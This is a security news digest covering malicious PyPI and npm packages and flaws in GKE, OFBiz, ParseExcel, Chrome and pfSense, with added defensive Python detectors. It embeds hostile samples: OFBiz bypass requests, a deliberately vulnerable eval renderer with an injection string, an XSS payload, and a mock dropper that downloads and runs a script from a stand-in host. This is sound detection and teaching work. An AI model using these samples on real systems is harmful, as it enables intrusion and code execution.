how human behavior affects security

Programmer’s Digest #64

12/27/2023-01/04/2024 3 Malicious PyPI Packages, Privilege Escalation Flaw Impacting Kubernetes Service, Critical Zero-Day in Apache OFBiz ERP System And More.

1. Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

Three new malicious packages have been discovered in the Python Package Index (PyPI) with the capability to deploy a cryptocurrency miner on Linux hosts. The packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. On first import they deploy a CoinMiner executable. The malicious code resides in the package's __init__.py, which decodes and retrieves the first stage from a remote server: a shell script ("unmi.sh") that fetches a configuration file for the mining activity as well as the CoinMiner binary hosted on GitLab. The ELF binary is then executed in the background with nohup, so the process keeps running after the session exits. Echoing the earlier 'culturestreak' package, these packages keep the payload off PyPI and host it at a remote URL, which leaves little for a scan of the package contents to detect.

2. Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. An attacker who has compromised the Fluent Bit logging container could combine that access with the high privileges required by Anthos Service Mesh (ASM), on clusters that have enabled it, to escalate privileges in the cluster. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out "data theft, deploy malicious pods, and disrupt the cluster's operations." Exploitation hinges on the attacker having already compromised a Fluent Bit container by some other initial access method, such as a remote code execution flaw. From there, on a cluster with ASM enabled, the attacker could obtain ASM's service account token and use it to escalate by creating a new pod with cluster-admin privileges. By way of fixes, Google has removed Fluent Bit's access to the service account tokens and re-architected ASM to remove its excessive role-based access control (RBAC) permissions.
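The chain above needs one precondition that is easy to audit: a token reachable from a compromised pod whose RBAC bindings permit creating pods, minting tokens or binding roles cluster-wide. The script below is an added example, not Google's or Unit 42's code. It checks the simplest form of that precondition, a pod's own mounted service-account token, against ClusterRoles and ClusterRoleBindings; the cluster state, role names and service-account names are constructed for the example and mimic the relevant fields of `kubectl get clusterroles,clusterrolebindings,pods -A -o json`.

```python
"""Report pods whose mounted service-account token carries cluster-wide
escalation rights. Added example with constructed input; the role and
service-account names below are hypothetical."""

# (resource, verb) pairs that let a principal escalate: creating pods runs
# code under any service account in that namespace; minting tokens or
# bindings hands out someone else's rights.
DANGEROUS_PAIRS = {
    ("pods", "create"),
    ("serviceaccounts/token", "create"),
    ("clusterrolebindings", "create"),
    ("rolebindings", "create"),
}
ESCALATING_VERBS = {"bind", "escalate", "impersonate", "*"}


def rule_is_dangerous(rule):
    resources = set(rule.get("resources", []))
    verbs = set(rule.get("verbs", []))
    if "*" in resources and verbs & {"*", "create"}:
        return True
    if verbs & ESCALATING_VERBS:
        return True
    return any((r, v) in DANGEROUS_PAIRS for r in resources for v in verbs)


def dangerous_cluster_roles(cluster_roles):
    return {cr["metadata"]["name"] for cr in cluster_roles
            if any(rule_is_dangerous(rule) for rule in cr.get("rules", []))}


def service_account_risks(bindings, bad_roles):
    """Map (namespace, serviceaccount) -> dangerous ClusterRoles bound to it."""
    out = {}
    for b in bindings:
        ref = b["roleRef"]
        if ref["kind"] != "ClusterRole" or ref["name"] not in bad_roles:
            continue
        for subj in b.get("subjects", []):
            if subj.get("kind") == "ServiceAccount":
                out.setdefault((subj["namespace"], subj["name"]), set()).add(ref["name"])
    return out


def find_escalation_paths(pods, bindings, cluster_roles):
    """(pod, serviceaccount, roles) for every pod that mounts a token with
    cluster-wide escalation rights: compromising that pod's runtime is
    enough to take the cluster."""
    sa_risks = service_account_risks(bindings, dangerous_cluster_roles(cluster_roles))
    findings = []
    for pod in pods:
        spec = pod["spec"]
        if not spec.get("automountServiceAccountToken", True):  # defaults to true
            continue
        ns = pod["metadata"]["namespace"]
        sa = spec.get("serviceAccountName", "default")
        roles = sa_risks.get((ns, sa))
        if roles:
            findings.append((f"{ns}/{pod['metadata']['name']}", sa, sorted(roles)))
    return findings


# Constructed sample cluster state (hypothetical names).
SAMPLE_ROLES = [
    {"metadata": {"name": "cluster-admin"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "log-reader"},
     "rules": [{"apiGroups": [""], "resources": ["pods", "pods/log"], "verbs": ["get", "list", "watch"]}]},
    {"metadata": {"name": "mesh-agent"},  # over-broad: may create pods anywhere
     "rules": [{"apiGroups": [""], "resources": ["pods", "services"], "verbs": ["create", "get", "list", "watch"]}]},
]
SAMPLE_BINDINGS = [
    {"roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "kube-system", "name": "mesh-controller"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "mesh-agent"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "kube-system", "name": "fluentbit-gke"}]},
    {"roleRef": {"kind": "ClusterRole", "name": "log-reader"},
     "subjects": [{"kind": "ServiceAccount", "namespace": "kube-system", "name": "fluentbit-readonly"}]},
]
SAMPLE_PODS = [
    {"metadata": {"namespace": "kube-system", "name": "fluentbit-gke-7xk2p"},
     "spec": {"serviceAccountName": "fluentbit-gke"}},
    {"metadata": {"namespace": "kube-system", "name": "fluentbit-gke-hardened"},
     "spec": {"serviceAccountName": "fluentbit-gke", "automountServiceAccountToken": False}},
    {"metadata": {"namespace": "kube-system", "name": "mesh-controller-0"},
     "spec": {"serviceAccountName": "mesh-controller"}},
    {"metadata": {"namespace": "default", "name": "web-5d9f"}, "spec": {}},
]


def audit_sample():
    return find_escalation_paths(SAMPLE_PODS, SAMPLE_BINDINGS, SAMPLE_ROLES)
```

The hardened Fluent Bit pod is skipped because it sets `automountServiceAccountToken: false`, which is the cheapest mitigation for a log shipper that never needs to talk to the API server. The audit only looks at ClusterRoleBindings; namespaced RoleBindings and group subjects would need the same treatment, and on GKE the Fluent Bit case also involved tokens of other pods exposed through a host mount, which this check does not model.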

3. Critical Zero-Day in Apache OFBiz ERP System Exposes Businesses to Attack

A new zero-day security flaw has been discovered in Apache OFBiz, an open-source Enterprise Resource Planning (ERP) system, that could be exploited to bypass authentication. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) released earlier in December. CVE-2023-51467 can be triggered with empty or invalid USERNAME and PASSWORD parameters in an HTTP request, which makes the login return an authentication success message and lets a threat actor reach otherwise protected internal resources. The bypass hinges on the request parameter "requirePasswordChange" being set to "Y" (yes): with it present, authentication succeeds regardless of the values passed in the username and password fields. Both issues are fixed in Apache OFBiz 18.12.11, and users should upgrade their instances without delay.
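The parameter combination above is easy to hunt for in web server logs. The detector below is an added example, not part of OFBiz or of any advisory: it parses Common Log Format lines and flags every request carrying `requirePasswordChange=Y`, noting whether USERNAME and PASSWORD were blank. The log lines are constructed and the request paths are illustrative.

```python
"""Hunt access logs for the CVE-2023-51467 parameter pattern. Added
example; log lines below are constructed, paths are illustrative."""

import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+'
)


def classify_request(target):
    """None for ordinary requests; otherwise a dict describing why the
    query string matches the bypass pattern."""
    q = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if q.get("requirePasswordChange", [""])[0].upper() != "Y":
        return None
    user = q.get("USERNAME", [""])[0]
    pw = q.get("PASSWORD", [""])[0]
    # The advisory text says any credentials work once the flag is set, so
    # the flag alone is the indicator; blank credentials just make it obvious.
    return {"blank_credentials": user == "" or pw == "", "username": user}


def scan_access_log(lines):
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify_request(m["target"])
        if verdict is not None:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "target": m["target"], **verdict})
    return hits


# Constructed sample log (RFC 5737 test addresses).
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Dec/2023:10:15:02 +0000] "GET /webtools/control/login?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512',
    '203.0.113.5 - - [27/Dec/2023:10:15:09 +0000] "POST /webtools/control/login HTTP/1.1" 302 0',
    '198.51.100.7 - - [27/Dec/2023:10:16:44 +0000] "GET /webtools/control/login?USERNAME=x&PASSWORD=y&requirePasswordChange=Y HTTP/1.1" 200 512',
    '192.0.2.9 - - [27/Dec/2023:10:20:00 +0000] "GET /images/ofbiz_logo.png HTTP/1.1" 200 8801',
]
```

The second sample line is a legitimate POST login: its parameters travel in the request body, which an access log does not record, so the same flag sent in a POST body is invisible to this check. Covering that case needs a WAF rule or application-level logging in front of OFBiz; the access-log detector is the cheap retrospective sweep, not the control.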

4. CISA warns of actively exploited bugs in Chrome and Excel parsing library

The first issue CISA added to its Known Exploited Vulnerabilities (KEV) catalog is CVE-2023-7101, a remote code execution vulnerability affecting versions 0.65 and older of the Perl Spreadsheet::ParseExcel library. The bug is caused by passing unvalidated input from a file into a string-type "eval"; specifically, it stems from the evaluation of Number format strings within the Excel parsing logic. One product using the open-source library is Barracuda ESG (Email Security Gateway), which Barracuda disclosed in late December had been targeted by Chinese threat actors exploiting CVE-2023-7101 to compromise appliances. The other addition to KEV is CVE-2023-7024, a heap buffer overflow in WebRTC in Google Chrome that allows an attacker to cause crashes or code execution. Because the bug is in Chromium's WebRTC, it could affect other browsers using WebRTC, not only Google Chrome. The flaw was discovered by Google's Threat Analysis Group (TAG) and received a fix via an emergency update on December 20, in versions 120.0.6099.129/130 for Windows and 120.0.6099.129 for Mac and Linux.
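The ParseExcel bug is an instance of a general class: a value read from an untrusted file is spliced into source text and evaluated. The following is an added example, not Spreadsheet::ParseExcel's code, that models the class in Python with a toy number-format renderer. The vulnerable function appends the format's quoted literal tail by building and `eval`-ing source; the hardened one parses the format against a strict grammar and never treats file content as code. The format grammar is a deliberately small subset of Excel's.

```python
"""CWE-95 in a number-format renderer: vulnerable form beside the fix.
Added example; the 'library' here is a toy, not ParseExcel."""

import re

CANARY = "<code ran>"  # stands in for whatever an attacker would execute


def format_number_unsafe(value, fmt):
    """VULNERABLE. Handles formats like 0.00" USD": digits decide the
    precision, the quoted tail is appended as literal text. The tail is
    copied into Python source verbatim, so a tail that closes the quote
    escapes into code."""
    digits, _, tail = fmt.partition('"')
    if tail.endswith('"'):
        tail = tail[:-1]
    decimals = len(digits.split(".")[1]) if "." in digits else 0
    code = f'"%.{decimals}f" % {value!r} + "{tail}"'
    return eval(code)  # deliberately vulnerable


# Strict grammar: integer part, optional decimals, optional %, optional
# quoted literal that may not itself contain a quote.
FORMAT_RE = re.compile(
    r'(?P<int>[#,0]+)(?:\.(?P<frac>0+))?(?P<pct>%)?(?:"(?P<lit>[^"]*)")?'
)


def is_valid_format(fmt):
    return FORMAT_RE.fullmatch(fmt) is not None


def format_number_safe(value, fmt):
    """Hardened: parse, then render with ordinary string formatting."""
    m = FORMAT_RE.fullmatch(fmt)
    if m is None:
        raise ValueError(f"rejected number format: {fmt!r}")
    decimals = len(m.group("frac") or "")
    if m.group("pct"):
        value = value * 100
    grouping = "," if "," in m.group("int") else ""
    out = f"{value:{grouping}.{decimals}f}"
    if m.group("pct"):
        out += "%"
    return out + (m.group("lit") or "")


# A format string that closes the literal early and splices in an expression.
MALICIOUS_FMT = '0.00"" + CANARY + ""'
```

With `MALICIOUS_FMT` the unsafe renderer evaluates `"%.2f" % 1234.5 + "" + CANARY + ""`, i.e. attacker-chosen code runs at parse time, which is what turns a spreadsheet attachment into an RCE primitive on a gateway that parses it. The safe renderer rejects the same string before anything is interpreted.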

5. ‘everything’ blocks devs from removing their own npm packages

Over the holidays, the npm package registry was flooded with more than 3,000 packages, including one called "everything" and others named after variations of the word. Installing "everything" would, at worst, exhaust your disk and slow your machine down; the real problem is that the package's mere existence on npmjs.com prevents authors with no connection to it from unpublishing their own packages from the world's largest JavaScript registry. The "everything" package lists just 5 sub-packages, published under the "@everything-registry" scope, as its dependencies. These 5 packages, however, gradually pull in every package on the entire registry as a dependency. For example, "everything" depends on "@everything-registry/chunk-2," which in turn pulls in further packages by the same author, such as "@everything-registry/sub-chunk-1623." Each of these sub-packages (or "chunks," as the author calls them) ultimately lists about 800 npm projects as dependencies. Since npm refuses to unpublish a package that other packages depend on, and "everything" transitively depends on every package (including yours), your package is stuck behind a dependent you never heard of.
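The mechanism is plain graph reachability: the registry checks direct dependents, but the chunk structure means a direct dependent exists for every package. The script below is an added example, not npm's code, with a constructed miniature registry that imitates the chunk layout; all package names in it are hypothetical. It answers the two questions an affected maintainer asks: who blocks my unpublish, and what would installing "everything" drag in.

```python
"""Reverse-dependency lookup over a constructed registry snapshot.
Added example; package names are hypothetical."""

from collections import deque

# name -> dependency names (constructed miniature of the 'everything' layout)
REGISTRY = {
    "everything": ["@everything-registry/chunk-1", "@everything-registry/chunk-2"],
    "@everything-registry/chunk-1": ["@everything-registry/sub-chunk-1",
                                     "@everything-registry/sub-chunk-2"],
    "@everything-registry/chunk-2": ["@everything-registry/sub-chunk-3"],
    "@everything-registry/sub-chunk-1": ["left-padder", "tiny-router"],
    "@everything-registry/sub-chunk-2": ["my-little-lib", "tiny-router"],
    "@everything-registry/sub-chunk-3": ["fast-json-ish"],
    "left-padder": [],
    "tiny-router": [],
    "my-little-lib": [],
    "fast-json-ish": [],
}


def reverse_graph(registry):
    """dependency -> set of packages that list it directly."""
    rev = {name: set() for name in registry}
    for name, deps in registry.items():
        for d in deps:
            rev.setdefault(d, set()).add(name)
    return rev


def dependents_of(name, registry):
    """All packages that transitively depend on `name` (BFS over reverse edges)."""
    rev = reverse_graph(registry)
    seen, queue = set(), deque(rev.get(name, ()))
    while queue:
        pkg = queue.popleft()
        if pkg in seen:
            continue
        seen.add(pkg)
        queue.extend(rev.get(pkg, ()))
    return seen


def unpublish_blockers(name, registry):
    """Direct dependents are what the registry's unpublish check looks at;
    the transitive set is whose cooperation you would actually need."""
    direct = reverse_graph(registry).get(name, set())
    return sorted(direct), sorted(dependents_of(name, registry))


def install_closure(name, registry):
    """Everything `name` would pull in on install (the other direction)."""
    seen, stack = set(), list(registry.get(name, ()))
    while stack:
        d = stack.pop()
        if d not in seen:
            seen.add(d)
            stack.extend(registry.get(d, ()))
    return seen
```

For `my-little-lib` the direct blocker is a chunk package, not "everything" itself, which is why the maintainer sees "some unknown package" in the error. A real registry dump has millions of edges, but the algorithm is the same; the practical fix was on npm's side, removing the packages that created the edges.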

Tags: 2024, digest, programmers'

Programmer’s Digest #63

12/20/2023-12/27/2023 New Chrome Zero-Day Vulnerability, Ivanti Releases Patches, Poorly Secured Linux SSH Servers Under Attack And More.

1. Urgent: New Chrome Zero-Day Vulnerability Exploited in the Wild – Update ASAP

Google has released security updates for Chrome addressing a high-severity zero-day flaw (CVE-2023-7024) in the WebRTC framework. The heap-based buffer overflow could lead to program crashes or arbitrary code execution. Google confirms that an exploit exists in the wild but is withholding details to limit further abuse. This is the eighth actively exploited Chrome zero-day since the year began, against a backdrop of 26,447 vulnerabilities disclosed in 2023. It remains unclear whether the flaw affects other WebRTC-capable browsers such as Mozilla Firefox and Apple Safari. Users should update Chrome to version 120.0.6099.129/130 (Windows) or 120.0.6099.129 (macOS and Linux).

2. Hackers Exploiting MS Excel Vulnerability to Spread Agent Tesla Malware

Attackers are exploiting an old Microsoft Office vulnerability (CVE-2017-11882) in phishing campaigns to distribute Agent Tesla malware, warns Zscaler ThreatLabz. Using decoy Excel documents in invoice-themed messages, the attackers trick users into opening a file that triggers the memory corruption flaw, enabling code execution with the user's privileges. Once the malicious attachment is opened, the Excel file contacts a malicious server and downloads additional files without further user interaction. The chain uses an obfuscated Visual Basic Script to download a JPG file with a Base64-encoded DLL embedded in it. The DLL is then injected into RegAsm.exe to launch Agent Tesla, an advanced keylogger and remote access trojan. A six-year-old, long-patched Equation Editor bug still paying off for attackers underscores how much unpatched Office remains in the field.

3. Decoy Microsoft Word Documents Used to Deliver Nim-Based Malware

A phishing campaign employs decoy Microsoft Word documents to deliver backdoor malware written in the Nim programming language, an uncommon choice that complicates analysis for security researchers. Netskope researchers detail the attack chain, which starts with a phishing email carrying a Word attachment that impersonates a Nepali government official. Once macros are enabled, the Nim malware is deployed and connects to remote servers mimicking Nepali government domains. Nim's cross-compilation features let attackers build a single codebase for multiple platforms. While some threat actors experiment with new malware strains, other phishing campaigns distribute known malware such as DarkGate and NetSupport RAT via email and compromised websites. Proofpoint identifies at least 20 DarkGate campaigns that switched to NetSupport RAT, exploiting a Windows SmartScreen bypass vulnerability (CVE-2023-36025) as a zero-day a month before its public disclosure.

4. Ivanti Releases Patches For 13 Critical Avalanche RCE flaws

Ivanti has issued critical security updates for its Avalanche enterprise mobile device management (MDM) solution, addressing 13 vulnerabilities. The flaws, stack- or heap-based buffer overflows, expose over 100,000 managed mobile devices to remote code execution by unauthenticated attackers. Exploitation occurs via specially crafted data packets sent to the Mobile Device Server. Ivanti urges users to update to Avalanche 6.4.2, as all supported versions (6.3.1 and above) are vulnerable. The update also addresses eight medium- and high-severity bugs covering denial of service, remote code execution, and server-side request forgery. This follows Ivanti's fix for critical buffer overflows in August and the chaining of MobileIron Core zero-days by threat actors in September.

5. Warning: Poorly Secured Linux SSH Servers Under Attack for Cryptocurrency Mining

Poorly secured Linux SSH servers are being targeted by malicious actors who install port scanners and dictionary attack tools on them. The goal is to compromise vulnerable servers for cryptocurrency mining and distributed denial-of-service (DDoS) attacks. AhnLab's Security Emergency Response Center (ASEC) reported that the threat actors may also sell breached IP addresses and account credentials on the dark web. The attacks begin by guessing SSH credentials through dictionary attacks, followed by deployment of malware, including scanners, to identify other susceptible systems. The scanners look for hosts with port 22 (SSH) open and propagate the infection through further dictionary attacks. Notably, the attackers run commands such as "grep -c ^processor /proc/cpuinfo" to count CPU cores, presumably to size the mining workload. The tools, believed to be created by PRG old Team, have been active since 2021. To mitigate the risk, users are advised to use strong, periodically rotated passwords and keep systems updated.
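Dictionary attacks of this kind leave a distinctive trail in sshd's syslog output: a burst of "Failed password" lines from one address, sometimes followed by an "Accepted password" from the same address, which is the moment to treat the account as compromised. The detector below is an added example, not ASEC's tooling; it parses auth.log lines in the standard OpenSSH format, finds addresses that exceed a failure threshold inside a sliding window, and reports password logins accepted from those addresses afterwards. The log lines are constructed.

```python
"""SSH dictionary-attack detection over auth.log lines. Added example;
log lines are constructed in OpenSSH's syslog format."""

import re
from collections import defaultdict
from datetime import datetime

SSH_RE = re.compile(
    r'^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: '
    r'(?P<event>Failed password|Accepted password|Accepted publickey) for '
    r'(?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+'
)


def parse_ts(ts):
    # syslog timestamps carry no year; only relative ordering is needed here
    return datetime.strptime(ts, "%b %d %H:%M:%S")


def detect(lines, threshold=5, window_s=60):
    """Return attacking IPs (with the failure count of their busiest window)
    and the password logins accepted from those IPs after failures began."""
    failures = defaultdict(list)
    accepted = []
    for line in lines:
        m = SSH_RE.match(line)
        if not m:
            continue
        t = parse_ts(m["ts"])
        if m["event"] == "Failed password":
            failures[m["ip"]].append(t)
        elif m["event"] == "Accepted password":
            accepted.append((t, m["user"], m["ip"]))

    attackers = {}
    for ip, times in failures.items():
        times.sort()
        best, start = 0, 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            attackers[ip] = best

    suspicious = [(user, ip) for t, user, ip in accepted
                  if ip in attackers and any(f <= t for f in failures[ip])]
    return {"brute_force": attackers, "suspicious_logins": suspicious}


# Constructed sample (RFC 5737 test addresses).
SAMPLE_AUTH_LOG = [
    "Dec 21 03:14:01 web1 sshd[2201]: Failed password for invalid user admin from 203.0.113.10 port 51234 ssh2",
    "Dec 21 03:14:03 web1 sshd[2203]: Failed password for invalid user oracle from 203.0.113.10 port 51240 ssh2",
    "Dec 21 03:14:05 web1 sshd[2205]: Failed password for root from 203.0.113.10 port 51246 ssh2",
    "Dec 21 03:14:08 web1 sshd[2207]: Failed password for root from 203.0.113.10 port 51252 ssh2",
    "Dec 21 03:14:11 web1 sshd[2209]: Failed password for root from 203.0.113.10 port 51258 ssh2",
    "Dec 21 03:14:14 web1 sshd[2211]: Failed password for root from 203.0.113.10 port 51264 ssh2",
    "Dec 21 03:14:16 web1 sshd[2213]: Accepted password for root from 203.0.113.10 port 51270 ssh2",
    "Dec 21 03:20:00 web1 sshd[2300]: Failed password for alice from 198.51.100.4 port 40000 ssh2",
    "Dec 21 03:25:00 web1 sshd[2301]: Failed password for alice from 198.51.100.4 port 40001 ssh2",
    "Dec 21 03:26:30 web1 sshd[2305]: Accepted publickey for deploy from 192.0.2.8 port 39000 ssh2",
    "Dec 21 03:27:00 web1 sshd[2306]: Accepted password for alice from 198.51.100.4 port 40002 ssh2",
]
```

Alice's two typos over seven minutes stay below the threshold, while the six-second burst followed by a successful root password login is the signature worth paging on. Detection is the fallback; the controls that remove the attack class are `PasswordAuthentication no` and `PermitRootLogin no` in sshd_config, with key-based logins for the accounts that remain.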

Tags: 2023, digest, programmers'

Programmer’s Digest #62

12/13/2023-12/20/2023 Oracle WebLogic Server Vulnerability, Security Vulnerabilities in pfSense Firewall Software, 116 Malware Packages Found on PyPI Repository And More.

1. 8220 Gang Exploiting Oracle WebLogic Server Vulnerability to Spread Malware

Threat actors associated with the 8220 Gang have been observed exploiting a high-severity flaw in Oracle WebLogic Server to propagate their malware. The security shortcoming is CVE-2020-14883 (CVSS score: 7.2), a remote code execution bug that authenticated attackers can exploit to take over susceptible servers. The vulnerability allows a remote authenticated attacker to execute code via a gadget chain and is commonly chained with CVE-2020-14882 (an authentication bypass also affecting Oracle WebLogic Server) or with leaked, stolen, or weak credentials. The 8220 Gang has a history of leveraging known security flaws to distribute cryptojacking malware. In May 2023, the group was spotted using another Oracle WebLogic flaw (CVE-2017-3506, CVSS score: 7.4) to rope servers into a crypto mining botnet.

2. New Security Vulnerabilities Uncovered in pfSense Firewall Software – Patch Now

Multiple security vulnerabilities have been discovered in Netgate's open-source pfSense firewall software that could be chained by an attacker to execute arbitrary commands on susceptible appliances. The issues comprise two reflected cross-site scripting (XSS) bugs and one command injection flaw. An attacker who exploited them could spy on traffic or attack services inside the local network. A brief description of the flaws is given below:

  • CVE-2023-42325 (CVSS score: 5.4) – An XSS vulnerability that allows a remote attacker to gain privileges via a crafted URL to the status_logs_filter_dynamic.php page.
  • CVE-2023-42327 (CVSS score: 5.4) – An XSS vulnerability that allows a remote attacker to gain privileges via a crafted URL to the getserviceproviders.php page.
  • CVE-2023-42326 (CVSS score: 8.8) – A lack of input validation that allows a remote attacker to execute arbitrary code via a crafted request to the interfaces_gif_edit.php and interfaces_gre_edit.php components.

Reflected XSS attacks occur when an attacker delivers a malicious script to a vulnerable web application, which returns it in the HTTP response so that it executes in the victim's browser. Attacks of this kind are therefore triggered by crafted links embedded in phishing messages or placed on a third-party website, for example in a comment section or in links shared on social media. In the case of pfSense, a logged-in administrator who follows such a link hands the attacker the ability to perform actions in the firewall with the victim's permissions, which is what makes the chain to the command injection flaw practical.
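The pattern behind the two pfSense XSS findings, a page that echoes a query parameter back into its own HTML, is shown below as an added example. It is not pfSense's code: the handler is a stand-in for a log-filter page written as plain functions so it runs without a web server, and the payload, hostnames and parameter name are constructed for the example. The vulnerable renderer and the hardened one differ only in output encoding, which is the whole fix for this bug class.

```python
"""Reflected XSS: vulnerable handler beside its fix. Added example,
not pfSense's code; URL, parameter and payload are constructed."""

from html import escape
from urllib.parse import parse_qs, quote, urlsplit

PAYLOAD = '"><script>alert(document.cookie)</script>'


def filter_param(url):
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return q.get("filter", [""])[0]


def render_vulnerable(url):
    """VULNERABLE: the raw parameter is concatenated into the HTML both as
    an attribute value and as text, so a crafted link runs script in the
    victim's session with the victim's firewall privileges."""
    value = filter_param(url)
    return (f'<input name="filter" value="{value}">\n'
            f'<p>Showing log entries matching {value}</p>')


def render_safe(url):
    """Hardened: escape for the HTML context at output time. quote=True
    also neutralises the quote characters that would close the attribute."""
    value = escape(filter_param(url), quote=True)
    return (f'<input name="filter" value="{value}">\n'
            f'<p>Showing log entries matching {value}</p>')


# Defence in depth: a CSP that forbids inline script stops the payload even
# if an encoding mistake slips through somewhere else on the page.
SAFE_HEADERS = {
    "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    "Content-Type": "text/html; charset=utf-8",
}


def demo_url():
    """The kind of link an attacker would send to an administrator."""
    return "https://fw.example.invalid/status_logs_filter.php?filter=" + quote(PAYLOAD)


def has_live_script(html):
    """Crude check: is there an unescaped <script> tag in the output?"""
    return "<script>" in html
```

Escaping at output time, for the context the value lands in, is the control; input filtering on arrival is brittle because the same value may be rendered in several contexts. For a management UI like a firewall's, pairing the escape with the CSP above and a short session lifetime limits what a successful reflection can do.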

3. 116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems

Cybersecurity researchers have uncovered 116 malicious packages on the Python Package Index (PyPI) that aim to infect Windows and Linux systems with a custom backdoor. ESET researchers identified the packages and estimate over 10,000 downloads since May 2023. The attackers employ several techniques, including placing malicious code in a test.py module, or in obfuscated form in __init__.py and setup.py so that it runs on import or install. The end goal is compromising hosts with malware, chiefly a backdoor capable of remote command execution, data exfiltration, and screenshots; it is implemented in Python for Windows and in Go for Linux. Alternatively, attack chains may deploy W4SP Stealer or a clipper that rewrites cryptocurrency wallet addresses in the clipboard. The incident joins a series of malicious Python packages used in supply chain attacks, such as the libraries distributing Sordeal Stealer in May 2023 and BlazeStealer last month. The researchers advise Python developers to vet downloaded code for these techniques. The discovery follows a set of npm packages that targeted a financial institution as part of an advanced adversary simulation exercise; the names of those modules were not disclosed.
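Both PyPI stories in this page (the miner droppers in Digest #64 and the 116 backdoor packages above) share a shape that static triage can catch before anything is installed: code in `__init__.py`, `setup.py` or `test.py` that decodes a blob or fetches a remote stage, executes it, and detaches it in the background. The scanner below is an added example, not Fortinet's or ESET's tooling. It walks a package directory and resolves import aliases with the `ast` module so that `from base64 import b64decode as d` is still recognised. The "malicious" sample package it builds is constructed for the example, contains no real payload, and is only parsed, never imported.

```python
"""Static triage of a Python package for decode/fetch/execute/detach
patterns. Added example; the sample package is constructed and is only
parsed, never executed."""

import ast, base64, os, re, tempfile, textwrap

SUSPICIOUS_CALLS = {
    "exec": "dynamic code execution",
    "eval": "dynamic code execution",
    "base64.b64decode": "decodes an embedded payload",
    "urllib.request.urlopen": "fetches a remote stage",
    "urllib.request.urlretrieve": "fetches a remote stage",
    "requests.get": "fetches a remote stage",
    "subprocess.Popen": "spawns a process",
    "subprocess.run": "spawns a process",
    "os.system": "spawns a shell",
    "os.popen": "spawns a shell",
}
HOT_FILES = {"__init__.py", "setup.py", "test.py"}  # run at import/install
B64_BLOB = re.compile(r"^[A-Za-z0-9+/=]{120,}$")


def import_aliases(tree):
    """Map local names to the modules/attributes they were imported as."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                aliases[a.asname or a.name] = a.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def dotted_name(node, aliases):
    """'a.b.c' for Name/Attribute chains with the head alias resolved."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if not isinstance(node, ast.Name):
        return None
    return ".".join([aliases.get(node.id, node.id)] + parts[::-1])


def scan_source(src, path):
    findings = []
    try:
        tree = ast.parse(src)
    except SyntaxError as e:
        return [(path, e.lineno or 0, "unparseable source")]
    aliases = import_aliases(tree)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            name = dotted_name(node.func, aliases)
            if name in SUSPICIOUS_CALLS:
                findings.append((path, node.lineno, f"{name}: {SUSPICIOUS_CALLS[name]}"))
            for arg in node.args:  # shell command strings that detach a process
                if isinstance(arg, ast.Constant) and isinstance(arg.value, str) and "nohup" in arg.value:
                    findings.append((path, node.lineno, "nohup: detaches a background process"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str) and B64_BLOB.match(node.value):
            findings.append((path, node.lineno, f"{len(node.value)}-char base64-looking blob"))
    return findings


def scan_package(root):
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if not f.endswith(".py"):
                continue
            p = os.path.join(dirpath, f)
            with open(p, encoding="utf-8") as fh:
                for path, line, why in scan_source(fh.read(), os.path.relpath(p, root)):
                    findings.append((("HOT " if f in HOT_FILES else "") + path, line, why))
    return findings


def build_sample_package():
    """Write a constructed two-module package to a temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="pypi-triage-")
    os.makedirs(os.path.join(root, "driftme_like"))
    stage_url = base64.b64encode(b"https://example.invalid/unmi.sh").decode()
    malicious = textwrap.dedent(f"""\
        import base64 as b, subprocess
        from urllib.request import urlopen
        _u = b.b64decode("{stage_url}").decode()
        open("/tmp/unmi.sh", "wb").write(urlopen(_u).read())
        subprocess.Popen("nohup sh /tmp/unmi.sh >/dev/null 2>&1 &", shell=True)
        """)
    with open(os.path.join(root, "driftme_like", "__init__.py"), "w") as fh:
        fh.write(malicious)
    with open(os.path.join(root, "driftme_like", "core.py"), "w") as fh:
        fh.write("from .core import helper\n__version__ = '1.0'\n")
    return root


def triage_sample():
    return scan_package(build_sample_package())
```

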